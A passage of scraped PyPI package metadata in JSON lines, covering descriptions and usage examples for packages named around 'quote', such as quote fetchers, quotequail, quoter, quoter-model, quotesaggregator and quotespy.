in a directory using theducommand (available on all *nix platforms).UsageIf no start directory is given all directories in the current one will be checked by default:$ qcheck\n./directory-0 4\n./directory-1 920\n...\n./directory-9 8248\n. 41264Choose directoriesSometimes it is required to get the quota of a defined subset of directories.It is possible to give folder names as arguments:$ qcheck directory-1 directory-2\n./directory-1 920\n./directory-2 120This method only make sense for a couple of directories. A greater folder list can be given by a text file. The folder names should? be written line by line in the text file. To use it give the option-tand than the filename like this:$ qcheck -t folder_set.txtIf the folder doesn\u2019t exist a \u201cDoesentExistException\u201d will show you that for every missing Folder.OutputBy default the result is written to the standard output in bit-format.Each directory-quota will be presented in one line:$ qcheck\n./directory-0 4\n./directory-1 920\n...\n./directory-9 8248\n. 41264The output can also converted to a human readable form with the-roption:$ qcheck -r\n./directory-0 4,0K\n./directory-1 920K\n...\n./directory-9 8,1M\n. 41Mfile-outputIf the file output is enabled with the option-fFILENAMEthe output will be written to a csv-file. The file will be created if it does not exists.If thefilealready exists, the new content will be saved as a new column in the document. The name of the column contains the date likeYY-MM:Example CSV outputdirectorys;2011-12;2012-03directory-1;0K;128Kdirectory-2;32M;132Mdirectory-3;980M;1.124GIf thecolumnalready exists the quotachecker will return a note that you have to set the-oparameter if you want to overwrite the column and exit.\nIf the-ooption is set quotachecker will overwrite the column by if it exist.RequirementsIf the installed python is at least 2.7 you have all what you need and there is nothing to install.If the installed python is 2.6 you need to installargparsewitch is already done if you installed the quotachecker with pip.TestingIf something doesn\u2019t work as described please first run the tests:python runtests.pyad send me me the output if it fails.Changelog1.7 (2012-05-09)Initial release"} +{"package": "quota-notifier", "pacakge-description": "Storage Quota NotifierA command line utility for emailing users when they exceed storage quota thresholds on mounted file systems.See theofficial documentationfor more details."} +{"package": "quotation", "pacakge-description": "No description available on PyPI."} +{"package": "quota-tracker", "pacakge-description": "quota-trackerQuotaTracker package"} +{"package": "quote", "pacakge-description": "Aboutquoteis a python wrapper for the Goodreads Quote API, powered bygazpacho.Quickstartquoteis simple to use:fromquoteimportquotesearch='Jasper Fforde'result=quote(search,limit=2)print(result)# [{'author': 'Jasper Fforde',# 'book': 'Something Rotten',# 'quote': 'If the real world were a book, it would never find a publisher. Overlong, detailed to the point of distraction-and ultimately, without a major resolution.'},# {'author': 'Jasper Fforde',# 'book': 'The Well of Lost Plots',# 'quote': \"After all, reading is arguably a far more creative and imaginative process than writing; when the reader creates emotion in their head, or the colors of the sky during the setting sun, or the smell of a warm summer's breeze on their face, they should reserve as much praise for themselves as they do for the writer - perhaps more.\"}]quotecan also be used as a command line tool:>>>max@mbp%quote'alain de botton'Peopleonlygetreallyinterestingwhentheystarttorattlethebarsoftheircages.\n\n>>>max@mbp%quote--search='alain de botton'Intimacyisthecapacitytoberatherweirdwithsomeone-andfindingthatthat'sokwiththem.Installpip install -U quoteContributeFor feature requests or bug reports, please useGithub Issues"} +{"package": "quote4py", "pacakge-description": "No description available on PyPI."} +{"package": "quoteBot", "pacakge-description": "this package will allow you to quickly make a twitter bot that tweets\nquotes with options for image generation of said quote.\n.inspired heavily by my previous creations,@Baudrillard_Botand@TOUGHLOVEBOT.WORK IN PROGRESS"} +{"package": "quoted", "pacakge-description": "quotedFeed your brain with the best random quotes from multiple web portals.FeaturesMultiple WEB sourcesCacheRich TextArgument optionsLogsRequirementsgit\npython 3x\npoetryInstallationLinux/MacOS$ pip install quotedWindowsUsage$ quoted\n\n\u201cInsanity is doing the same thing, over and over again, but expecting different results.\u201d\n\u2015\u2015 Narcotics Anonymous\n\ntags: humor, insanity, life, misattributed-ben-franklin, misattributed-mark-twain, misattributed-to-einstein\nlink: https://www.goodreads.com/quotes/5543-insanity-is-doing-the-same-thing-over-and-over-again\n\n\u00a9 goodreads\n\nPowered by quotedDevelopmentRun$ poetry install\n$ poetry run quotedBuild$ poetry buildThe distribution packages are located indistdirectory.Publish$ poetry publishSpidersSpider output is a list of dicts with the structure:[\n {\n 'author': 'Author Name',\n 'text': 'Text of Quote',\n 'tags': ['tag1','tag2'],\n 'url': 'https://www.quotesource.com/linktoquote'\n }\n]TodoSupportsbashandzshOutput formatsTags filerSite SelectorContributionFile bugs, feature requests inGitHub Issues."} +{"package": "quote-depencives", "pacakge-description": "No description available on PyPI."} +{"package": "quotee", "pacakge-description": "QuoteeSmall App To getQuotesdepend onZenquotes ApiQuotee Usagefromquotee.randomimportQuoteeexample=Quotee()quote=example.quoteauthor=example.authorprint(quote)print(author)"} +{"package": "quote-Extract", "pacakge-description": "Welcome to Quote_ExtractThis is a simple package aimed at providing motivational Quotes. You can used this Qoutes for business, Websites, For Blogging\u2026etc. This package uses an API to make quote requests from a website and return them to you as a text.How it worksAfter installing it. import it in your programimport quote_ExtractIt has 3 main functions quote(), author(), quote_author()-quote() returns the quote only\n-author() just the authors name\n-quote_author() both the quote and authors nameBE MOTIVATED USING QUOTES"} +{"package": "quotefancy", "pacakge-description": "QuotefancyYou can use to this Package to get random quotes as Text or Images. You can Download Quote too!Install it aspip install quotefancyUsage Guidefrom quotefancy import get_quote\n\n# Downloading quote as Image\nget_quote(type='img', download=True)\n\n# Getting as Text\nprint(get_quote(type='text'))CopyrightNew-Dev"} +{"package": "quotefix", "pacakge-description": "UNKNOWN"} +{"package": "quotegen", "pacakge-description": "This is a random quote generator library function.Change log0.0.1 (08/07/23)First Release"} +{"package": "quote-generator-0216", "pacakge-description": "No description available on PyPI."} +{"package": "quotehub", "pacakge-description": "#quotehub is a python package that provides you with random quotes\n#how to use:import quotehub\n\nquotes = quotehub.all()\nprint(quotes)#the above instance gives you access to all the quotes\n#you can specifie a particular persons quote like bill gates or mark zuckerberg.import quotehub\n\nquotes = quotehub.mark() #for mark zuckerbergs quotes\nprint(quotes)#or\nfrom quotehub import mark, bill, elun, hackers #etcquotes = bill()\nprint(quotes)#list of all the methods you can use are\nquotehub.all()\nquotehub.mark()\nquotehub.jobs()\nquotehub.bill()\nquotehub.elun()\nquotehub.tesla()\nquotehub.einstein()\nquotehub.science()\nquotehub.hackers()\nquotehub.success()#never the less just print\nimport quotehubprint(dir(quotehub)) to get all the method you can use#the only dependency this package need is the random module, but you don't need to install it in your program it comes pre-installed.#please note that this project is open source and open for collaboration, lets grow this quote project.#visit our github repo fork the repo, git clone on your local pc and send a pull request to us, we\n#will review it and add it to the package\n#and don't forget to add a readme file or our doc#github repohttps://github.com/cyber-maphian/quote-hub.git"} +{"package": "quote-lines", "pacakge-description": "quoteA tiny CLI used for quoting input linesExampleConsider the directory:$find.\n.\n./c\n./abHere,xargsalone will fail if we do:find . -type f | xargs catwith:This file is named: c\ncat: ./a: No such file or directory\ncat: b: No such file or directoryThis is because the file 'a b' is not quoted!Instead we can do:find . -type f | quote | xargs catand we will get:This file is named: c\nThis file is named: a b"} +{"package": "quote-maker", "pacakge-description": "Quote MakerJust another python script to automate boring stuff. Quote maker easy to create a quoted image and publish to a Facebook page.Depended Python libstextwrapPILInstall by \"pip3 install --upgrade -r requirements.txt\" or \"conan install --file requirements.txt\"Depended libs* curl 7.52.1 (x86_64-pc-linux-gnu) \n* libcurl/7.52.1 \n* OpenSSL/1.0.2l \n* zlib/1.2.8Runrun the script by$:python3.6 main.py\n****************************************************************************************\n\u200b~~~ quote_maker.py ~~~\nquote: Infinite love is the only truth. Everything else is illusion. David IckeOutputPost to FacebookTo enable access of Facebook to publish, following variable has to be hardcoded to achieve.page_id- facebook page ID, information can obtain from the page about. if you want to post on the personal walljust hardcodepage_id= \"me\".facebook_token- facebook access token with publish_action enable. for more visitGraph API explorer:https://developers.facebook.com/tools/explorer/145634995501895/Please uncomment #os.system(command) in main.pyHow to change image size?image_size_ximage_size_yresponcible for image size.Note: background colour is random, but the fourground colour is always white."} +{"package": "quote-manager", "pacakge-description": "library.quote.managerHelper nlp library for handling non ascii quotes.Usagefromquote_managerimportQuotessentence=\u201cThat\u2019san\u2018magic\u2019shoe.\u201dquotes_sentence=Quotes(sentence)quotes_sentence.simplified>>\"That's an 'magic' shoe.'# do stuff here...transformed_sentence=transform(quotes_sentence.simplified)# ex. grammar correction: \"That's a 'magic' shoe.'quotes_sentence.requote_modified_string(transformed_sentence)>>\u201cThat\u2019sa\u2018magic\u2019shoe.\u201d"} +{"package": "quote-ondemand", "pacakge-description": "Random QuotesGet the random quote from the internet.Note: The quotes are fetched using publicly hosted API's. Any change to the Authentication/Authorization or Request/Response format can cause a failure.InstallationYou can install the package fromPyPI:python -m pip install quote-ondemandThequotesis supported on Python 3.x.How to useAs as console applicationpython -m pip install quote-ondemandAs an module in your project>>> import quote\n>>> quote.__version__\n'1.0.0'a\n\n>>> from quote import QuoteFactory\n>>> QuoteFactory.get_quote()\n\nThe entire history of software engineering is that of the rise in levels of abstraction.\n- Grady Booch"} +{"package": "quotequail", "pacakge-description": "A library that identifies quoted text in plain text and HTML email messages.\nquotequail has no mandatory dependencies, however using HTML methods require\nlibxml.(Interested in working on projects like this?Close.iois looking forgreat engineersto join our team)Introductionquotequail comes with the functions listed below which are documented in detail\nin quotequail\u2019s__init__.py.quote(text): Takes a plain text message as an argument, returns a list of\ntuples. The first argument of the tuple denotes whether the text should be\nexpanded by default. The second argument is the unmodified corresponding\ntext.quote_html(html): Likequote(), but takes an HTML message as an\nargument.unwrap(text): If the passed text is the text body of a forwarded message,\na reply, or contains quoted text, a dictionary is returned, containing the\ntype (reply/forward/quote), the text at the top/bottom of the wrapped\nmessage, any parsed headers, and the text of the wrapped message.unwrap_html(text): Likeunwrap(), but takes an HTML message as an\nargument.ExamplesIn[1]:importquotequailIn[2]:quotequail.quote(\"\"\"Hello world.\n\nOn 2012-10-16 at 17:02 , Someone wrote:\n\n> Some quoted text\n\"\"\")Out[2]:[(True,'Hello world.\\n\\nOn 2012-10-16 at 17:02 , Someone wrote:'),(False,'\\n> Some quoted text\\n')]In[3]:quotequail.unwrap(\"\"\"Hello\n\nBegin forwarded message:\n\n> From: \"Some One\" \n> Date: 1. August 2011 23:28:15 GMT-07:00\n> To: \"Other Person\" \n> Subject: AW: AW: Some subject\n>\n> Original text\n\nText bottom\n\"\"\"))Out[3]:{'date':'1. August 2011 23:28:15 GMT-07:00','from':'\"Some One\" ','subject':'AW: AW: Some subject','text':'Original text','text_bottom':'Text bottom','text_top':'Hello','to':'\"Other Person\" ','type':'forward'}"} +{"package": "quoter", "pacakge-description": "Usagefrom quoter import *\n\nprint single('this') # 'this'\nprint double('that') # \"that\"\nprint backticks('ls -l') # `ls -l`\nprint braces('curlycue') # {curlycue}\nprint braces('curlysue', padding=1)\n # { curlysue }Cute\u2026but way too simple to be useful, right? Read on!Let\u2019s try something more complicated, where the output has to be\nintelligently based on context. Here\u2019s a taste of quoting some HTML\ncontent:print html.p(\"A para\", \".focus\")\nprint html.img('.large', src='file.jpg')\nprint html.br()\nprint html.comment(\"content ends here\")Yields:

A para

\n\n
\nThis goes well beyond \u201csimply wrapping some text with other text.\u201d The\noutput format varies widely, correctly interpreting CSS Selector-based\ncontrols, using void/self-closing elements where needed, and using\nspecialized markup such as the comment format when needed. The HTML quoter\nand its companion XML quoter are competitive in power and simplicity with\nbespoke markup-generating packages.(A similar generator for Markdown is also newly included, though it\u2019s a the\n\u201cdemonsration\u201d rather than \u201cuse in production code\u201d stage.)Finally,quoterprovides a drop-dead simple, highly functional,joinfunction:mylist = list(\"ABCD\")\nprint join(mylist)\nprint join(mylist, sep=\" | \", endcaps=braces)\nprint join(mylist, sep=\" | \", endcaps=braces.but(padding=1))\nprint and_join(mylist)\nprint and_join(mylist[:2])\nprint and_join(mylist[:3])\nprint and_join(mylist, quoter=double, lastsep=\" and \")Yields:A, B, C, D\n{A | B | C | D}\n{ A | B | C | D }\nA and B\nA, B, and C\nA, B, C, and D\n\"A\", \"B\", \"C\" and \"D\"Which shows a range of separators, separation styles (both Oxford and\nnon-Oxford commas), endcaps, padding, and individual item quoting. I daresay\nyou will not find a more flexible or configurablejoinfunctionanywhereelse, in any programming language, at any price.And if you like any particular style of formatting, make it your own:>>> my_join = join.but(sep=\" | \", endcaps=braces.but(padding=1))\n>>> print my_join(mylist)\n{ A | B | C | D }Now you have a convenient specialized formatter to your own specifications.Seethe rest of the story\nat Read the Docs."} +{"package": "quoteran", "pacakge-description": "quoteranGet random quotes in terminal.This project fetch theQuotable.io API.InstallYou can installQuoteranfrom PyPI:pipinstallquoteranTo get the last version:pipinstallgit+https:/github.com/UltiRequiem/quoteranIf you use Linux, you may need to install this with sudo to\nbe able to access the command throughout your system.UsagequoteranLicenseThis project is Licensed under theMITLicense.AlternativeI also developed this in Nodejs:UltiRequiem/ranmessThe version written in Nodejs is significantly faster,\nand it was even easier to develop and publish than this.Update: Thanks toPoetrynow it's just as easy\nto publish as an npm package, maybe a bit more."} +{"package": "quoter-model", "pacakge-description": "Quoter ModelThis repository is a packaged version of code using thequoter modelas a model for social information flow [1]. The model was further explored and this code was further developed by Tyson Pond [2,3].The quoter model offers an idealistic mechanism for how people communicate written information in online social contexts (i.e. tweets on Twitter or posts on Facebook). The model runs on a social network, where each node (user) takes turns generating a sequence of words by one of two mechanisms:(i) copying a segment of a random neighbor's past text with probability $q$(ii) randomly generating new text according to a vocabulary distribution.We can then apply thecross-entropy(an information-theoretic measure which satisfies temporal precedence, referred to ashxin the code) to quantify information flow between each pair of users text.Installation and usagepip install quoter-modelThis will appear in your list of installed packages asquoter-model, but included in a python script byimport quoter.The most relevant usage of this package, as shown in the examples, would be to run something likefrom quoter.quoter_model import quoter_model_simand then run that function with relevant arguments.Currently the simulation is dependent on theProcessEntropypackage which can have C-related install issues; a workaround for this (as detailed at that repo) is to first runpip install --no-dependencies ProcessEntropy\npip install numba numpy nltkAlternatively you can modify the source code insidequoter/quoter_modelto use the local version ofCrossEntropy.See the examples for ideas on experiments to run, parameters to vary in simulations, etc.Example networksInsidesrc/quoter/real_networksare many examples of real networks, along with a module for parsing them into an appropriate format, that can be used to run simulations on.These have been compiled from different sources and are intended only as a starting point; other networks could be found, for example, at the onlinenetwork repositoryorICON.An example usage of the real networks is calculating their so-callededge clustering coefficientinexamples/edge_clustering.py. Example simulations for different parameters of ER, BA, WS, SBM networks are also found in theexamples directory, which is initialised as a module and can therefore be called in scripts.Note also that the simulation currently only works with uniformly weighted networks. An extension would be to use edge weights either as non-uniform quoting probabilites, or once an ego has \"decided\" to quote, to choose from its predecessors preferentially based on the connecting weights.DocumentationThere are autogenerated html docs indocs/_build/html/index.html, produced by runningmake htmlinsidedocs/(the makefile itself being auto-generate by aftersphinx-quickstart).Many of the docstrings are produced using docify so may need double checking. The docs are also now available atreadthedocs, and this is configured to re-build every time the github repo is pushed to, however it does not seem to be hosting the same html as I get locally! If anyone knows how to solve this please let me know:)Common abbreviationsER = Erd\u0151s\u2013R\u00e9nyi random graphBA = Barab\u00e1si\u2013Albert random graphWS = Watts\u2013Strogatz (small-world) graphSBM = Stochastic Block ModelRequirementsWorks withPython 3.6+[Networkx 1.11] Initially ran on this; now on 3.1 but in case you have any issues this would be whySee therequirements.txtfile for further dependencies. Note that for some advanced use of thenetworkxpackage, which may be included withinquoter, it may be helpful to runpip install networkx[default]TODOMake sure all docstrings are in reST/sphinx formatAdd more helpful commentsMake documentation better and available online [crude version available online at quoter-model.readthedocs.io]Add more typing to function argsAdd verbose output to quoter_model_sim() [done, needs testing/improving]Better syncing between simulation and processing scripts in the examples [done]get_modularity is currently defined in multiple different files, giving redundanciesRepository structuredist/contains the distribution archives generated usingpython3 -m build, and are an alternative way of installing the package for local usedocs/contains the auto-generated docs, as previously mentionedsrc/contains the actual package. I'm not too sure why it needs to be two levels down, but seems to work in any casetests/contains future tests for the package. As you can see, it is currently emptyAll the files in the base directory (this one) are fairly self explanatory (except maybepyproject.toml- at least it wasn't to me before I compiled this package - it is wherepipgets its package metadata from).References[1] Bagrow, J. P., & Mitchell, L. (2018). The quoter model: A paradigmatic model of the social flow of written information.Chaos: An Interdisciplinary Journal of Nonlinear Science, 28(7), 075304.[2] Pond, T. C. (2020). Measuring and Modeling Information Flow on Social Networks (Doctoral dissertation, The University of Vermont and State Agricultural College).[3] Pond, T., Magsarjav, S., South, T., Mitchell, L., & Bagrow, J. P. (2020). Complex contagion features without social reinforcement in a model of social information flow.Entropy, 22(3), 265."} +{"package": "quoters", "pacakge-description": "quotersA python library that gives you beautiful quotes.To installpip install quotersDocumentationhttps://github.com/suman-kr/quoters"} +{"package": "quoterz", "pacakge-description": "This will hold very long_description from README."} +{"package": "quotes", "pacakge-description": "Small python package to read quote sets from csv files.Installationpip install quotesUsageGet a random quote:fromquotesimportrandomif__name__=='__main__':print(random())List of available persons:fromquotesimportpersonsif__name__=='__main__':print(persons())"} +{"package": "quotesaggregator", "pacakge-description": "QuotesAggregatorQuotesAggregator \u00e9 um programa agregador de cota\u00e7\u00f5es que armazena os valores instant\u00e2neos de v\u00e1rias moedas para criar e\nsalvar candles de 1, 5 e 10 minutos num banco de dados atrav\u00e9s da API da Poloniex.Gr\u00e1ficos gerados a partir do banco de dados:Como UtilizarPr\u00e9-requisitosDockerUtilizandodocker-composeupExecutando testes unit\u00e1rios# Na pasta raiz do projeto# Lembre-se de criar um virtual envpipinstall--no-cache-dir-rrequirements.txt\npytestCriando graficosClique aquiDecis\u00f5es de arquiteturaUso de websokets ao inv\u00e9s da HTTP APIPara manter a consist\u00eancia dos dados seria necess\u00e1rio fazer varias requisi\u00e7\u00f5es a HTTP API e por conta disso,\npoderia ser bloqueado ou ter requisi\u00e7\u00f5es recusadas, al\u00e9m de receber dados desnecess\u00e1rios. Por conta disso,\nutilizei websockets API, dessa forma basta inscrever-se no canal para receber a atualiza\u00e7\u00e3o das moedas.Uso de bibliotecas asyncioO programa demanda muito IO (receber os dados da API, salva-los), por isso, optei por utilizar bibliotecas\nass\u00edncronas para isso, dessa forma o programa n\u00e3o \u00e9 bloqueado enquanto a recebimento ou envio de dados.Utiliza\u00e7\u00e3o do prodictPara facilitar a leitura do c\u00f3digo, utilizei uma classe que se comporta como um dicion\u00e1rio, por\u00e9m deixa os\natributos mais leg\u00edveis e funcionalidade de autocomplete.Objeto candle n\u00e3o contem a currency_idUma estrat\u00e9gia poss\u00edvel, seria utilizar outra chave do candle contendo o \u2018id\u2019 da moeda, por\u00e9m ao utiliza-lo seria\nnecess\u00e1rio iterar, no pior caso, sobre toda a lista, ou seja, O(n). Utilizando um dicion\u00e1rio que se comporta como\num HashMap a complexidade de tempo cai paraO(1) no caso m\u00e9dio, ou seja, a complexidade de tempo para encontrar os candles \u00e9 O(1).N\u00e3o Utiliza\u00e7\u00e3o de ORMTamb\u00e9m seria poss\u00edvel utilizar um ORM para facilitar a intera\u00e7\u00e3o com o banco de dados, por\u00e9m optei por utilizar\nconsultas SQL para demonstrar os meus conhecimentos em SQL (Mesmo que, nessa prova, apenas consultas simples s\u00e3o\nnecess\u00e1rias).FuncionamentoApos se inscrever no canal Ticker Data \u00e9 recebido a atualiza\u00e7\u00e3o do valor das moedas, este valor \u00e9 processado e a partir\ndele \u00e9 criado um objeto chave-valor que contem uma lista de 3 candles de 1 5, 10 minutos respetivamente, ent\u00e3o estes\ncandles recebem atualiza\u00e7\u00e3o constantemente, at\u00e9 que o per\u00edodo do candle se encerre e ele seja salvo e os seus atributos\nsobrescritos.ResultadosOs candles gerados podem ser encontrados atrav\u00e9s do banco de dados dispon\u00edvel na porta34807da sua maquina. Al\u00e9m\ndisso, o programa gera logs vis\u00edveis no stdout do docker.Dificuldades (Resolvidas)Como nunca havia testado m\u00e9todos ass\u00edncronos ainda, foi dif\u00edcil entender como faze-lo.Ao criar a tabela, utilizei float para os campos, e n\u00e3o comportava o tamanho de alguns valores recebidos, mudei para\nDECIMAL, que inclusive \u00e9 mais adequado para valores monet\u00e1rios por problemas de arredondamento em outros tipos de\ndados.Por desconhecer o modulo aiomysql, cometi o erro de n\u00e3o fazer o commit na transa\u00e7\u00e3o do banco de dados, e por isso, os\ndados n\u00e3o eram salvos. Para corrigir habilitei o autocommit na chamada.Tentei algumas abordagens para saber quando salvar o candle, uma delas deixava os valores de abertura-fechamento\nerrado, pois ele considerava o valor pertencente ao per\u00edodo como valor inicial, sendo que o valor do final de um deve\nser igual ao inicial do outro, al\u00e9m disso, o candle de 1 minuto estava sendo atualizado a cada 2 minutos, pois eu\nutilizei o modulo de 2 ao inv\u00e9s do de 1, porque todo numero dividido por um tem resto 0, ent\u00e3o ele salvaria o candle\nantes de o minuto ser finalizado. A solu\u00e7\u00e3o foi junto ao modulo, verificar se o tempo do candle atual era diferente do\nnovo valor recebido.Observa\u00e7\u00e3o importanteUm dos criterios da avalia\u00e7\u00e3o \u00e9 o formato de distribui\u00e7\u00e3o, e tendo em vista que o programa \u00e9 uma biblioteca que ao\nchamar \u00e9 sempre executada (N\u00e3o dando espa\u00e7o para que outro script consuma qualquer parte do mesmo), o programa \u00e9\ndistribuido atrav\u00e9s de um \"executavel\" hospedado no The Python Package Index (PyPi)\n.Link aquiPara executa-lo fa\u00e7a (fora do projeto):pipenvinstallquotesaggregator\npipenvshellexportQUOTESAGGREGATOR_DB_HOST=localhostexportQUOTESAGGREGATOR_DB_PORT=3306exportQUOTESAGGREGATOR_DB_USER=adminexportQUOTESAGGREGATOR_DB_PASSWORD=adminexportQUOTESAGGREGATOR_DB_NAME=quotes\n\nagregator-runLembre-se que o container do MySQL deve estar rodando ou tamb\u00e9m \u00e9 poss\u00edvel usar outro banco MySQL desde que ele possua a\ntabela (comando de cria\u00e7\u00e3o emdb-init/init.sql)."} +{"package": "quotes-api", "pacakge-description": "No description available on PyPI."} +{"package": "quotescli", "pacakge-description": "QuotesPyQuotesPy is an open source program that displays a random quote from a celebritie as a notificationinstallationbuild from source :git clone https://github.com/0RaMsY0/QuotesPy\n cd QuotesPy\n python setup.pyinstall using pip :pip install quotescliUsageargumentsArguments formusage-h--helpshow help-sn--search-by-namesearch for the quote of someone by his name-st--search-by-topicsearch for the quote of a topic-T--Topicdisplay all the availables Topics-t--timeset a time to display the quote-pr--print-quoteprint the quote into the console (in default it will be shown as a notification)Examples :- search by name (-sn).- search by Topic (-st)- this is how the quote well be displaied (as a notification) if the -pr is not used- the diferents Topics that you can search for quote about them (use -T to diplay them)ressoursesQuotesPy useshttps://www.brainyquote.com/to scrape search resultes and displays it to the user\nby a notification or directly to the terminal"} +{"package": "quotes-fetcher", "pacakge-description": "No description available on PyPI."} +{"package": "quotes-generator", "pacakge-description": "Quotes-GeneratorHaving all type of quotes ! . Best Quotes of IT legend peoples.Easy to useTechnologyPython :-Pythonis an interpreted, high-level and general-purpose programming language.Requests :- Therequestsmodule allows you to send HTTP requests using Python.BeautifulSoup :-Beautiful Soupis a Python library for pulling data out of HTML and XML files.INSTALLATION$ pip installquotes_generatorWORKINGimportquotes_generatorTo get Motivational's quotesquote = quotes_generator.motivational_quotes() \nprint(quote)To get Albert Einstein's quotesquote = quotes_generator.albert_einstein_quotes() \nprint(quote)To get Mahatma Gandhi's quotesquote = quotes_generator.mahatma_gandhi_quotes() \nprint(quote)To get Steve Jobs's quotesquote = quotes_generator.steve_jobs_quotes() \nprint(quote)To get Bill Gates's quotesquote = quotes_generator.bill_gates_quotes() \nprint(quote)To get Elon Musk's quotesquote = quotes_generator.elon_musk_quotes() \nprint(quote)To get Mark Zuckerberg's quotesquote = quotes_generator.mark_zuckerberg_quotes() \nprint(quote)License"} +{"package": "quotesgeneratorapi-wrapper", "pacakge-description": "quotes-generator-api."} +{"package": "quotespy", "pacakge-description": "quotespyPython library to create quotes/lyrics and tweet graphics with PILIt can be installed through pip usingpip install quotespy.UsageQuotes/Lyrics GraphicsCreate a graphic (.png) for lyrics, with default setings, saved in the current directory:importquotespy.graphics.graphicsasggraphic_info={\"title\":\"strange_days\",\"text\":\"Say goodbye to the silence, we can dance to the sirens\"}g.create_graphic(graphic_info,{},default_settings_format=\"lyrics\")I encourage you to also try out the \"quote\"default_settings_formatoption.Alternatively, you can specify custom graphic settings and omit default settings options (note custom settings are chosen over default settings if both are specified).importquotespy.graphics.graphicsasggraphic_info={\"title\":\"strange_days\",\"text\":\"Say goodbye to the silence, we can dance to the sirens\"}custom_settings={\"font_family\":\"arial.ttf\",\"font_size\":250,\"size\":[2800,2800],\"color_scheme\":[\"#000\",\"#fff\"],\"wrap_limit\":20,\"margin_bottom\":0}save_dir=\"some_path\"g.create_graphic(graphic_info,custom_settings,save_dir=save_dir)Plus, in this second example, the path in which to save the created graphic is also specified.Please note all fields/keys shown forgraphic_infoand forcustom_settingsin the examples are always required.If you have a .txt or .json file with multiple lyrics/quotes, you can also load it and create individual graphics with a single function, just specify the path to the source file and the graphic settings (either custom or a default format).importquotespy.graphics.graphicsasgg.gen_graphics(\"samples\\\\lyrics.txt\",{},default_settings_format=\"lyrics\",save_dir=\"some_path\")For more information on the text formatting required from these .txt and .json source files, please refer to thesamplesfolder in this repository. It contains example files.Tweet GraphicsTweet graphics works largely the same as thegraphicscounterpart. The biggest difference is that it uses a different module, and the dictionaries require a couple of additional fields.Starting with the most basic usage:importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}t.create_tweet(tweet_info,{},default_settings_format=\"blue\",save_dir=\"some_path\")Just like the other module has its own default settings formats, for tweets there are three options, which differ mostly in the color scheme: \"blue\", \"light\" and \"dark\".That \"user_pic\" key's value in thetweet_infodictionary can either be a path to a .png file, or it can be left as an empty string. In other words, having a profile picture in the graphic is optional, but the dicitonary must always have the key. Also, note that the picture is pre-processed by reducing its dimensions to 10% of the graphic's dimensions, with a circular crop.If you want to use custom graphic settings, you can use the following example for reference:importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":100,\"font_size_header\":80,\"size\":[1800,1800],\"color_scheme\":[\"#000000\",\"#ffffff\"],\"wrap_limit\":32,\"margin_bottom\":30}t.create_tweet(tweet_info,graphic_settings)And, just like for thecreate_graphicsmodule, you can also bulk generate tweet graphics, but this time only from .json source files:importquotespy.tweet_graphics.tweet_graphicsastt.gen_tweets(\"samples\\\\tweets.json\",{},default_settings_format=\"dark\")New in v1.2: transparent backgroundsStarting in version 1.2, quotespy now accepts RGBA color strings to create transparent backgrounds. The red, green and blue channels are integers between 0 and 255, the alpha/transparency value is a float between 0 and 1.importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":100,\"font_size_header\":80,\"size\":[1800,1800],\"color_scheme\":[\"rgba(255, 255, 255, 0)\",\"#ffffff\"],\"wrap_limit\":32,\"margin_bottom\":30}t.create_tweet(tweet_info,graphic_settings)Alternatively,Nonecan be passed as the background color to create a transparent background. These new color options are available for bothtweet_graphicsandgraphics.New in v1.3 (tweet_graphics): custom profile picture sizeStarting with quotespy 1.3, it is possible to speficify the dimensions for which the profile picture will be cropped. By default, the picture is cropped to be one tenth of the graphic's width and height.In the following example, the profile picture will be cropped to the 120x120 size, as specified by theprofile_pic_sizekey in thegraphic_settings.importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":40,\"font_size_header\":25,\"size\":[700,700],\"profile_pic_size\":[40,40],\"color_scheme\":[\"#fff\",\"#000\"],\"wrap_limit\":32,\"margin_bottom\":20}t.create_tweet(tweet_info,graphic_settings)However, if you want to stick with the default cropping dimensions, then you can pass twoNones inside theprofile_pic_sizelist. This is shown in the following example.importquotespy.tweet_graphics.tweet_graphicsasttweet_info={\"tweet_name\":\"mistakes\",\"user_name\":\"Jos\u00c3\u00a9 Fernando Costa\",\"user_tag\":\"@ze1598\",\"user_pic\":\"user_photo2.png\",\"tweet_text\":\"Some mistakes and, dare I say, failures may lead to results you had never thought you could achieve.\"}graphic_settings={\"font_family\":\"arial.ttf\",\"font_size_text\":40,\"font_size_header\":25,\"size\":[700,700],\"profile_pic_size\":[None,None],\"color_scheme\":[\"#fff\",\"#000\"],\"wrap_limit\":32,\"margin_bottom\":20}t.create_tweet(tweet_info,graphic_settings)Caveats for the custom profile picture size:The picture is not vertically aligned in the header;The width and the height must use the same value (that is, it must be a square).Real Example UsageLastly, I'd like to you show some \"advanced\" usage of thistweet_graphicsmodule (hopefully it serves as inspiration for thegraphicsmodule as well):importquotespy.tweet_graphics.tweet_graphicsastimportosSAVEDIR=\"imgs\"USERNAME=\"Jos\u00c3\u00a9 Fernando Costa\"USERTAG=\"@ze1598\"# List of `tweet_info` dictionariestweets=[{\"tweet_name\":\"compare_to_others_sometimes\",\"user_name\":USERNAME,\"user_tag\":USERTAG,\"user_pic\":\"\",\"tweet_text\":\"Compare yourself to others once in a while (using a reasonable scale!). If you completely isolate yourself you will end up working aimlessly without ever knowing when it is enough or how much you've 